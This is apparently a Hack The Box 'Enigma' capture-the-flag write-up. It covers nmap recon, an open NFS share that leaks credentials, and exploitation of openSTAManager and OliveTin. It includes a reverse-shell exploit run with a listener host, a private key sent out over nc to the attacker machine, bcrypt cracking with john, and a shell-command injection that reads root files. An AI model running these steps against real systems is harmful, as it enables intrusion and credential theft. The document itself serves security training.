HTB - Enigma
Reconaissance:
First we need to get an idea of what’s on our target so we run nmap and find a few mailbox services, rpcbind and a nginx webserver. Since we have a nfs share lying around we start there after visiting the nginx server and mount the network share as it is available to all users. We find credentials for User: Kevin – Password: Enigma2024!, we can use those on a mail server service named Roundcube mail. We try in different services for reused password and we eventually find out that the User: Sarah (Who sent a email to roundcube mailbox) reuses the Password: Enigma 2024!. Inside Sarah’s mailbox we find a email with an url to a openSTAManager application and User: admin – Password: Ne3s4rtars78s credentials for it.
nmap -sV -v -sC 10.129.21.229
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.16 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_ 256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open http nginx 1.24.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://enigma.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=enigma
| Subject Alternative Name: DNS:enigma
| Issuer: commonName=enigma
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-02-18T20:33:33
| Not valid after: 2036-02-16T20:33:33
| MD5: 8361 ca20 2e4e dff6 6e90 1445 7458 9fc3
| SHA-1: 9f91 b6ed 85b4 517c 0421 c62e 167d 5631 daa6 5a40
|_SHA-256: 98a8 1f62 b59c 832a 162e 2394 9e41 1e08 46a0 f7c1 529f afcb ea15 eea5 ef52 bb70
|_pop3-capabilities: CAPA UIDL TOP AUTH-RESP-CODE STLS SASL PIPELINING RESP-CODES
|_ssl-date: TLS randomness does not represent time
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 37685/tcp mountd
| 100005 1,2,3 49935/tcp6 mountd
| 100005 1,2,3 59374/udp6 mountd
| 100005 1,2,3 59753/udp mountd
| 100021 1,3,4 32857/tcp6 nlockmgr
| 100021 1,3,4 35674/udp nlockmgr
| 100021 1,3,4 36019/tcp nlockmgr
| 100021 1,3,4 51386/udp6 nlockmgr
| 100024 1 49253/udp6 status
| 100024 1 56479/tcp6 status
| 100024 1 58665/tcp status
| 100024 1 59198/udp status
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/tcp6 nfs_acl
143/tcp open imap Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: ID more capabilities LITERAL+ have LOGIN-REFERRALS ENABLE SASL-IR IDLE post-login Pre-login listed STARTTLS IMAP4rev1 LOGINDISABLEDA0001 OK
| ssl-cert: Subject: commonName=enigma
| Subject Alternative Name: DNS:enigma
| Issuer: commonName=enigma
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-02-18T20:33:33
| Not valid after: 2036-02-16T20:33:33
| MD5: 8361 ca20 2e4e dff6 6e90 1445 7458 9fc3
| SHA-1: 9f91 b6ed 85b4 517c 0421 c62e 167d 5631 daa6 5a40
|_SHA-256: 98a8 1f62 b59c 832a 162e 2394 9e41 1e08 46a0 f7c1 529f afcb ea15 eea5 ef52 bb70
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
| ssl-cert: Subject: commonName=enigma
| Subject Alternative Name: DNS:enigma
| Issuer: commonName=enigma
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-02-18T20:33:33
| Not valid after: 2036-02-16T20:33:33
| MD5: 8361 ca20 2e4e dff6 6e90 1445 7458 9fc3
| SHA-1: 9f91 b6ed 85b4 517c 0421 c62e 167d 5631 daa6 5a40
|_SHA-256: 98a8 1f62 b59c 832a 162e 2394 9e41 1e08 46a0 f7c1 529f afcb ea15 eea5 ef52 bb70
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: ID AUTH=PLAINA0001 LITERAL+ more LOGIN-REFERRALS ENABLE SASL-IR IDLE capabilities post-login listed have IMAP4rev1 Pre-login OK
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: CAPA UIDL TOP AUTH-RESP-CODE USER SASL(PLAIN) PIPELINING RESP-CODES
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=enigma
| Subject Alternative Name: DNS:enigma
| Issuer: commonName=enigma
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-02-18T20:33:33
| Not valid after: 2036-02-16T20:33:33
| MD5: 8361 ca20 2e4e dff6 6e90 1445 7458 9fc3
| SHA-1: 9f91 b6ed 85b4 517c 0421 c62e 167d 5631 daa6 5a40
|_SHA-256: 98a8 1f62 b59c 832a 162e 2394 9e41 1e08 46a0 f7c1 529f afcb ea15 eea5 ef52 bb70
2049/tcp open nfs_acl 3 (RPC #100227)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
showmount -e 10.129.21.229
Export list for 10.129.21.229: /srv/nfs/onboarding *
sudo mount -t nfs 10.129.21.229:/srv/nfs/onboarding /mnt -o nolock
Found credentials in pdf file. username: kevin password: Enigma2024! for a mail service at mail001.enigma.htb
sudo echo “10.129.21.229 mail001.enigma.htb” >> /etc/hosts
Found some credentials being reused
Username: Sarah Password: Enigma2024!
Inside Sarah’s mailbox we have more credentials
URL: support_001.enigma.htb username: admin Password: Ne3s4rtars78s
Foothold:
First, we dump the SQL database using injection, initially hoping for credentials that would open everything for us. We then leverage another CVE-2025-69212, we then send a reverse shell over and use nc to catch it from our attacker machine. We then change user to haris and since we aren’t getting a fully interactive tty, we create a ssh keypair and use those to authenticate to the ssh service.
CVE-2026-24418
We can just clone this and just run the exploit with the session cookie we get with our admin credentials. > python3 exploit.py -t http://support_001.enigma.htb -u admin -p Ne3s4rtars78s -c it4ktvasebt9c70cv6qldo4pdo –users
Result of user dump:
ID: 2 Username: haris Email: haris@enigma.htb Enabled: 1 Hash: $2y10WHf1T79sxjsZongUKT2jGeexTkvihBQyCZeoYXmObiNphrsZDr6eC
john –format=bcrypt hashes4john.txt –wordlist=/usr/share/wordlists/rockyou.txt
bestfriends (?)
We now have new credentials
Username: haris Password: bestfriends
openSTAManager 2.9.8 CVE-2026-38751
This gets us access to start running commands.
python3 exploit.py -u http://support_001.enigma.htb -U admin -P Ne3s4rtars78s –lport 6969 –lhost 10.10.15.24 –interactive
su haris
Password: bestfriends
User flag:
e8cca2344b1cf5f370e54a36e71e7c10
find / -perm -u=s -type f 2>/dev/null:
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/fusermount3
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/mount
/usr/bin/su
/usr/bin/chsh
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/sbin/mount.nfs
To get a functional ssh connection we create a key pair and authorized the key and send the key to our host and connect directly
ssh-keygen -b 2048 -t rsa
nc 10.10.15.24 1337 < id_rsa (On victim)
touch authorized_keys && cat id_rsa > authorized_keys (If necessary fix your perms with chmod 600)
On attacker:
nc -lvnp 1337 > id_rsa
ssh -i id_rsa haris@10.129.22.122
Privilege Escalation:
Here we go we are in. After reading the config.yaml for OliveTin i realised there was a localhost webserver on port 1337, accepting unauth commands and running them as root, that obvously how we escalate. Since the OliveTin accepts localhost connections we forward to our attacker machine the webservice. And, lastly we use an SQL injection in the password field since, it is the one vulnerable to injection. We escape with ’ ; < arbitrary-cmd > ; #. With that we could make a new key pair to fully own the machine but we read all text file in /root/ for the flag.
No PoC just complimentary bedtime reading: CVE-2026-27626
OliveTin config.yaml
Listen on all addresses available, port 1337 listenAddressSingleHTTPFrontend: 0.0.0.0:1337
defaultPermissions: view: true exec: true logs: true
This setting effectively enables or disables guests. If set to true, then users will have to login to do anything. authRequireGuestsToLogin: false
ssh forwarding
ssh -i id_ed25519 -o IdentitiesOnly=yes -L 1337:0.0.0.0:1337 haris@10.129.22.122
Now we can go into the OliveTin execution app and we want to enter into the password field our injection which is:
db_pass payload: x’ ; cat /root/*.txt ; #
Root flag:
ca64d74969fbfb9423f1f7e8e12290a4